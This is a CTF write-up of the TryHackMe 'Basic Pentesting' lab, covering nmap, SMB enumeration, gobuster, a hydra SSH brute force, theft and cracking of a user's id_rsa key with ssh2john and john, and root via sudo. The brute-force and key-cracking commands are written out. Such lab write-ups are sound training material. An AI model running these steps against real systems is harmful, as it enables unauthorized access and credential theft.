CTF-Writeups/TryHackMe/Basic_pentesting.md

268 lines
16 KiB
Markdown
Raw Normal View History

2020-11-01 18:33:29 +00:00
# TryHackMe-Basic Pentesting
>Abdullah Rizwan | 07:04 PM | 1st November , 2020
## NMAP
```
Nmap scan report for 10.10.207.136
Host is up (0.17s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
| 256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|_ 256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open ajp13?
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http-proxy
| fingerprint-strings:
| ms-sql-s, oracle-tns:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 2243
| Date: Sun, 01 Nov 2020 14:11:05 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 400
|_ Request</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font
ily:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-c
olor:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;
color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name
{color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><bod
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.7
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/
submit.cgi?new-service :
SF-Port8080-TCP:V=7.80%I=7%D=11/1%Time=5F9EC1F9%P=x86_64-pc-linux-gnu%r(or
SF:acle-tns,95F,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/html;charse
SF:t=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x202243\r\nDate:\
SF:x20Sun,\x2001\x20Nov\x202020\x2014:11:05\x20GMT\r\nConnection:\x20close
SF:\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x20Sta
SF:tus\x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20type=\"te
SF:xt/css\">h1\x20{font-family:Tahoma,Arial,sans-serif;color:white;backgro
SF:und-color:#525D76;font-size:22px;}\x20h2\x20{font-family:Tahoma,Arial,s
SF:ans-serif;color:white;background-color:#525D76;font-size:16px;}\x20h3\x
SF:20{font-family:Tahoma,Arial,sans-serif;color:white;background-color:#52
SF:5D76;font-size:14px;}\x20body\x20{font-family:Tahoma,Arial,sans-serif;c
SF:olor:black;background-color:white;}\x20b\x20{font-family:Tahoma,Arial,s
SF:ans-serif;color:white;background-color:#525D76;}\x20p\x20{font-family:T
SF:ahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}\x2
SF:0a\x20{color:black;}\x20a\.name\x20{color:black;}\x20\.line\x20{height:
SF:1px;background-color:#525D76;border:none;}</style></head><bod")%r(ms-sq
SF:l-s,95F,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/html;charset=utf
SF:-8\r\nContent-Language:\x20en\r\nContent-Length:\x202243\r\nDate:\x20Su
SF:n,\x2001\x20Nov\x202020\x2014:11:05\x20GMT\r\nConnection:\x20close\r\n\
SF:r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x20Status\x
SF:20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20type=\"text/cs
SF:s\">h1\x20{font-family:Tahoma,Arial,sans-serif;color:white;background-c
SF:olor:#525D76;font-size:22px;}\x20h2\x20{font-family:Tahoma,Arial,sans-s
SF:erif;color:white;background-color:#525D76;font-size:16px;}\x20h3\x20{fo
:0{color:black;}\x20a\.name\x20{color:black;}\x20\.line\x20{height:1px;b
SF:ackground-color:#525D76;border:none;}</style></head><bod");
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: basic2
| NetBIOS computer name: BASIC2\x00
| Domain name: \x00
| FQDN: basic2
|_ System time: 2020-11-01T09:11:08-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-11-01T14:11:08
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 167.02 seconds
```
## PORT 80
<img src="https://imgur.com/OLJ7xaK.png"/>
## PORT 8080
<img src="https://imgur.com/3V494fv.png"/>
## Smb Shares
Port 139 and 445 are open see lets see if we can access the samba shares
<img src="https://imgur.com/IT3LDqi.png"/>
<img src="https://imgur.com/EOVK7av.png"/>
From the `staff.txt` that we just grabbed , we can find two usernames `jan` and `kay`.
```
Announcement to staff:
PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, Jan!)
-Kay
```
## Gobuster
Running gobuster we can find a directory `/development`
```
gobuster dir -u http://10.10.207.136/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.207.136/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/11/01 19:18:49 Starting gobuster
===============================================================
/development (Status: 301)
Progress: 3698 / 220561 (1.68%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2020/11/01 19:20:02 Finished
===============================================================
```
<img src="https://imgur.com/Q0ItoLg.png"/>
`j.txt`
```
For J:
I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.
-K
```
`dev.txt`
```
2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm
using version 2.5.12, because other versions were giving me trouble. -K
2018-04-22: SMB has been configured. -K
2018-04-21: I got Apache set up. Will put in our content later. -J
```
## Hydra
Now jan is the username we found and it has a weak password so lets bruteforce it using hydra and we know that there is ssh runnin on the box so,
```
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.207.136
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-11-01 19:27:32
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.207.136:22/
[STATUS] 176.00 tries/min, 176 tries in 00:01h, 14344223 to do in 1358:22h, 16 active
t[STATUS] 112.00 tries/min, 336 tries in 00:03h, 14344063 to do in 2134:32h, 16 active
tt
[22][ssh] host: 10.10.207.136 login: jan password: armando
```
<img src="https://imgur.com/FLDBsrg.png"/>
Visti kay's home directory and there you can read `.ssh/id_rsa` private key for logging into ssh , send and receive it through netcat
<img src="https://imgur.com/WDpCcKJ.png"/>
But we still cannot login because that `id_rsa` is password protected
<img src="https://imgur.com/1KZChBk.png"/>
Use `ssh2john` to get hash of `id_rsa` file
```
root@kali:~/TryHackMe/Easy/BasicPentesting# /usr/share/john/ssh2john.py id_rsa > hash_for_id_rsa
```
Now run `john hash_for_id_rsa`
```
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
Proceeding with incremental:ASCII
0g 0:00:00:56 3/3 0g/s 2748Kp/s 2748Kc/s 2748KC/s pigr3sr..pigr0ts
0g 0:00:00:57 3/3 0g/s 2760Kp/s 2760Kc/s 2760KC/s jalyoun..jalyof4
0g 0:00:00:58 3/3 0g/s 2772Kp/s 2772Kc/s 2772KC/s 1llgod..1llgu1
0g 0:00:05:23 3/3 0g/s 2294Kp/s 2294Kc/s 2294KC/s fcp0luf..fcp0l46
0g 0:00:05:24 3/3 0g/s 2297Kp/s 2297Kc/s 2297KC/s nadah76..nadahro
0g 0:00:06:36 3/3 0g/s 2351Kp/s 2351Kc/s 2351KC/s gaudlsd..gaudsk3
0g 0:00:07:21 3/3 0g/s 2381Kp/s 2381Kc/s 2381KC/s civlup42..civl12mt
0g 0:00:07:22 3/3 0g/s 2384Kp/s 2384Kc/s 2384KC/s adiskak2..adiskuas
0g 0:00:09:14 3/3 0g/s 2527Kp/s 2527Kc/s 2527KC/s cornsexice..cornsexto1
0g 0:00:09:15 3/3 0g/s 2528Kp/s 2528Kc/s 2528KC/s cujkdc1..cujkdd4
0g 0:00:09:16 3/3 0g/s 2530Kp/s 2530Kc/s 2530KC/s bslhmf6..bslhm82
0g 0:00:09:17 3/3 0g/s 2532Kp/s 2532Kc/s 2532KC/s psyctiu..psyct29
0g 0:00:09:18 3/3 0g/s 2534Kp/s 2534Kc/s 2534KC/s tr00ge1..tr00gak
0g 0:00:09:19 3/3 0g/s 2536Kp/s 2536Kc/s 2536KC/s kmdufs1..kmduf6q
0g 0:00:12:52 3/3 0g/s 2458Kp/s 2458Kc/s 2458KC/s ecicos7..ecicots
0g 0:00:12:53 3/3 0g/s 2460Kp/s 2460Kc/s 2460KC/s eussce7..eussc14
0g 0:00:12:54 3/3 0g/s 2461Kp/s 2461Kc/s 2461KC/s exxza8f..exxzay!
0g 0:00:12:55 3/3 0g/s 2463Kp/s 2463Kc/s 2463KC/s eevzco5..eevzcuk
0g 0:00:12:56 3/3 0g/s 2464Kp/s 2464Kc/s 2464KC/s ublhl..ublni
0g 0:00:12:57 3/3 0g/s 2466Kp/s 2466Kc/s 2466KC/s 0zjnhb..0zjnd4
0g 0:00:12:58 3/3 0g/s 2467Kp/s 2467Kc/s 2467KC/s l4zb3n..l4zpay
0g 0:00:12:59 3/3 0g/s 2469Kp/s 2469Kc/s 2469KC/s hfu71s..hfu706
0g 0:00:13:01 3/3 0g/s 2471Kp/s 2471Kc/s 2471KC/s 4s18le..4s18cw
0g 0:00:13:02 3/3 0g/s 2473Kp/s 2473Kc/s 2473KC/s mcjau03..mcjau25
0g 0:00:13:03 3/3 0g/s 2474Kp/s 2474Kc/s 2474KC/s cim0cno..cim0c11
beeswax (id_rsa)
```
<img src="https://imgur.com/z0d6Xi2.png"/>
Now to become root we can run ALL commands
```
Matching Defaults entries for kay on basic2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User kay may run the following commands on basic2:
(ALL : ALL) ALL
kay@basic2:~$
```
so `sudo bash`
<img src="https://imgur.com/SYNGX9N.png"/>